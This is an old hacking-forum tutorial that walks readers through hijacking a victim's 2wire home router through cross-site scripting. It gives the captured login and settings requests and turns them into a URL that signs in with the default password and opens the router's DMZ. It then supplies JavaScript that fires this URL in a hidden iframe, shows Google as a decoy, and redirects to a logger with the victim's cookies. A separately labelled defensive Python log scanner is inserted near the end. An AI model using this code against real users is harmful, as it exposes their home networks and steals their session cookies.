Advanced XSS Series: Router Jacking
2009-05-02 19:49
Author: t3hmadhatt3r

Hello... Today I made some code to enable DMZ mode on my router (a 2wire), and I am going to show you how you can make your own scripts to do the same! Notes are in BLUE, tips are in GREEN. OK, the basic idea of this script is to abuse certain "features" that come with the router and take advantage of the fact that most people leave their router password at the default, because the router can only be accessed from the inside, right??? Not exactly.
Router authentication varies between routers, so we need to find out how the user authenticates and how we can do the same using a URL. If the router uses a popup and makes you log in as soon as you try to access it, then you can authenticate simply by using Code:
http://username:password@192.168.254.254/
But if the router uses form authentication, you must use other methods. Since my router asks only for a password when you try to access protected components, I could not use the username:password method. I will show you exactly how I found a way to log in to my router using just a URL. Note: Form authentication uses form fields like the ones we usually see on current sites such as MySpace. If the router uses these, try the http://username:password method anyway... it may work. First I wanted to see what HTTP request my browser was making to log in, so I used Burp Proxy (part of the Burp Suite) to watch the request made by my browser. Note: Burp Suite can be downloaded from http://portswigger.net/suite/. I logged in and grabbed the following request with Burp Proxy. Code:
POST /xslt HTTP/1.1
Host: 192.168.254.254
User-Agent: Removed for obvious reasons.
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.254.254/xslt?PAGE=E02&THISPAGE=A02_POST&NEXTPAGE=E02
Content-Type: application/x-www-form-urlencoded
Content-Length: 108

PAGE=A02_POST&THISPAGE=A02_POST&NEXTPAGE=E02&CMSKICK=&PAGE=E02&THISPAGE=A02_POST&NEXTPAGE=E02&PASSWORD=admin

As you can see, I am using the default password of admin. The request submits the parameters Code:
PAGE=A02_POST&THISPAGE=A02_POST&NEXTPAGE=E02&CMSKICK=&PAGE=E02&THISPAGE=A02_POST&NEXTPAGE=E02&PASSWORD=admin
So I decided to use them in a URL like so. Code:
http://192.168.254.254/xslt?PAGE=A02_POST&THISPAGE=A02_POST&NEXTPAGE=E02&CMSKICK=&PAGE=E02&THISPAGE=A02_POST&NEXTPAGE=E02&PASSWORD=admin
And I was successfully logged in!!!
Now we will look for the features we want to tamper with... My router has a firewall we could disable and a DMZ mode we could enable. In this guide I will only enable the DMZ, but the firewall settings could be changed in the same way. First I watched the request made when I enabled DMZ mode and got the following. Code:
POST /xslt HTTP/1.1
Host: 192.168.254.254
User-Agent: Removed for obvious reasons.
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.254.254/xslt
Cookie: WHPL=TRUE%3B+SESSKEY%3DWS-3342-1908300%3B+
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

PAGE=E02_POST_DMZ&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&NODEID=0&category=ALL&FWALLOW=ALL_TRAFFIC

As you may have noticed, we are now submitting the cookie we received when we logged in. The problem with this is that our injected JavaScript will not hold that session cookie the way a logged-in browser does. I still needed the URL to activate DMZ mode anyway, so just like last time I submitted the parameters within the URL like so. Code:
http://192.168.254.254/xslt?PAGE=E02_POST_DMZ&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&NODEID=0&category=ALL&FWALLOW=ALL_TRAFFIC
Of course this failed because a valid cookie wasn't submitted. Now I needed to find a URL that would log me in and enable the DMZ at the same time. To find the appropriate parameters, I opened my browser and tried to change the DMZ setting without being authenticated, using the URL above. It then said I needed a password to access that area. Can you guess what I did next??? I entered my password and grabbed the request sent to the router. That request looked something like this. Code:
POST /xslt HTTP/1.1
Host: 192.168.254.254
User-Agent: Removed for obvious reasons.
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.254.254/xslt?PAGE=A02_POST
Cookie: WHPL=TRUE%3B+SESSKEY%3DWS-3342-1908300%3B+
Content-Type: application/x-www-form-urlencoded
Content-Length: 214

PAGE=A02_POST&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&CMSKICK=&PAGE=E02_POST_DMZ&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&NODEID=0&category=ALL&FWALLOW=ALL_TRAFFIC&PASSWORD=admin

Notice the PASSWORD parameter.... This one request logged me in and enabled DMZ mode!! Exactly what we want!!!! Just like before, I added the parameters to a URL like this. Code:
http://192.168.254.254/xslt?PAGE=A02_POST&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&CMSKICK=&PAGE=E02_POST_DMZ&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&NODEID=0&category=ALL&FWALLOW=ALL_TRAFFIC&PASSWORD=admin
Now we need to make a .js file that will invisibly change what we want and open an iframe to a valid page. To do this we will write the HTML out from JavaScript, so we can use the <iframe> tag inside our JavaScript file.... The code I came up with is Code:
// Hidden iframe that carries the router request; visible iframe that shows a normal page.
document.write('<body topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0">');
document.write('<iframe frameborder="0" scrolling="no" height="0" width="0" src="http://192.168.254.254/xslt?PAGE=A02_POST&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&CMSKICK=&PAGE=E02_POST_DMZ&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&NODEID=0&category=ALL&FWALLOW=ALL_TRAFFIC&PASSWORD=admin"></iframe>');
document.write('<iframe src="http://www.google.com/" width="100%" height="100%" frameborder="0"></iframe>');

Note: As you can see, we also used the body tag. Writing HTML out from JavaScript can be very useful for many different things; remember this. This script opens an invisible iframe to change the victim's router settings and a borderless iframe to Google... Now you might be wondering how you will log their IP... Well, we will make the script redirect to an info logger after 8 seconds to log the date, referer, IP and, guess what? Cookies as a bonus. Code:
// Same as above, plus a timed redirect to the logger page after 8 seconds.
document.write('<body topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0">');
document.write('<iframe frameborder="0" scrolling="no" height="0" width="0" src="http://192.168.254.254/xslt?PAGE=A02_POST&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&CMSKICK=&PAGE=E02_POST_DMZ&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&NODEID=0&category=ALL&FWALLOW=ALL_TRAFFIC&PASSWORD=admin"></iframe>');
document.write('<iframe src="http://www.google.com/" width="100%" height="100%" frameborder="0"></iframe>');
setTimeout("document.location='info.php?c='+document.cookie;", 8000);

Making the script redirect to Google (because that's where the iframe pointed... this way we don't make the victim suspicious, and there will be no evidence they were hacked because the page ends up on a valid site) after 8 seconds allows the router jacker to load completely on most systems. The info.php file we are using is just 1nj3cth4x's cookie logger. You can find it at http://1nj3ct.net/viewtopic.php?f=9&t=12. Everyone thank 1nj3cth4x! OK, now we have hacked their router, logged their IP, stolen their cookies and logged the date.... We can now connect to the ports they have open on their box. Tip: Don't forget to look for other "features" you can abuse. Note: This router jacker works on my router. You can follow the same steps to hack other routers too... Lastly, you need to know how to inject the script... It is as easy as Code:
<script src="http://subdomain.host.com/script.js"></script>
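From the defender's side, here is an added example (my own Python, not code from the original post) that flags the request shapes the technique above produces in a router or proxy log: a password carried in the query string, a state-changing 2wire page (a name containing _POST) requested via GET, and a Referer from a site other than the router itself. The "METHOD PATH REFERER" log layout and the credential parameter names are my assumptions, and the sample lines are constructed from the requests shown in the post.

```python
# Added example, not from the original post: flag the request shapes a
# router-jacking page produces, as seen from the router's (or a proxy's) log.
from urllib.parse import urlparse, parse_qs

ROUTER_HOST = "192.168.254.254"                    # the router address used in the post
CREDENTIAL_PARAMS = {"password", "passwd", "pwd"}  # assumption: query keys that carry a secret

def check_request(method, url, referer):
    """Return the findings for one request to the router's web interface."""
    findings = []
    params = parse_qs(urlparse(url).query, keep_blank_values=True)
    lower = {k.lower(): v for k, v in params.items()}
    # A password in the query string ends up in logs, history and Referer headers.
    if lower.keys() & CREDENTIAL_PARAMS:
        findings.append("credential submitted in query string")
    # 2wire page names containing _POST change state; they should never be reachable via GET.
    if method == "GET" and any("_POST" in p for p in lower.get("page", [])):
        findings.append("state-changing page requested via GET")
    # A request triggered by a page on another site carries that site's Referer.
    ref_host = urlparse(referer).hostname if referer else None
    if ref_host and ref_host != ROUTER_HOST:
        findings.append("cross-origin referer " + ref_host)
    return findings

def scan_log(text):
    """Parse constructed 'METHOD PATH REFERER' lines; return {line_no: findings} for flagged lines."""
    report = {}
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        method, path, referer = line.split(" ", 2)
        found = check_request(method, "http://" + ROUTER_HOST + path, "" if referer == "-" else referer)
        if found:
            report[n] = found
    return report

# Constructed sample: a normal page view, the iframe-driven DMZ request from the post
# (loaded from the attacker's page), and a normal in-browser form POST.
SAMPLE_LOG = """\
GET /xslt?PAGE=E02&THISPAGE=A02_POST&NEXTPAGE=E02 http://192.168.254.254/xslt
GET /xslt?PAGE=A02_POST&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&CMSKICK=&PAGE=E02_POST_DMZ&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&NODEID=0&category=ALL&FWALLOW=ALL_TRAFFIC&PASSWORD=admin http://subdomain.host.com/page.html
POST /xslt http://192.168.254.254/xslt
"""

if __name__ == "__main__":
    for line_no, found in scan_log(SAMPLE_LOG).items():
        print(line_no, found)
```

Only the second line is reported; the first is a plain page view and the third is the router's own form POST with the router as Referer.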
You may be wondering how you know what type of router your victim is using?? Well, in the next tutorial I will show you how to enumerate routers. Soon I will release router hacking packs for different routers... Look for them in the exploits section. OK! I hope you learned a lot and enjoyed reading! Please leave comments and suggestions..